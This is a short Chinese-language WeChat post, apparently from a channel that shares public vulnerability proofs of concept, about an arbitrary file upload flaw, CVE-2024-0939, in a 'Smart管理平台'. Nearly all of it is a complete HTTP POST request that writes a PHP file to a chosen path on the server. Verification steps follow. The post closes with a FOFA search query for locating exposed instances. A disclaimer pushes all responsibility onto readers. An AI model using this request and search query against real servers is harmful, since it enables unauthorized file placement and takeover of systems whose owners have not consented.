smart管理平台多版本任意文件上传-CVE-2024-0939
smart管理平台多版本任意文件上传-CVE-2024-0939
小白菜安全 小白菜安全 2024-02-17 19:33
免责声明
该公众号主要是分享互联网上公开的一些漏洞poc和工具,
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。
漏洞影响范围
多版本
漏洞复现
poc
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.10.7:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123
Content-Length: 294
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Connection: close
-----------------------------123
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream
poc
-----------------------------123
Content-Disposition: form-data; name="txt_path"
/home/poc.php
-----------------------------123--
漏洞复现
1. 出现以下信息代表漏洞存在
2.访问上传文件url+home/poc.php
搜索语法
fofa:”Smart管理平台”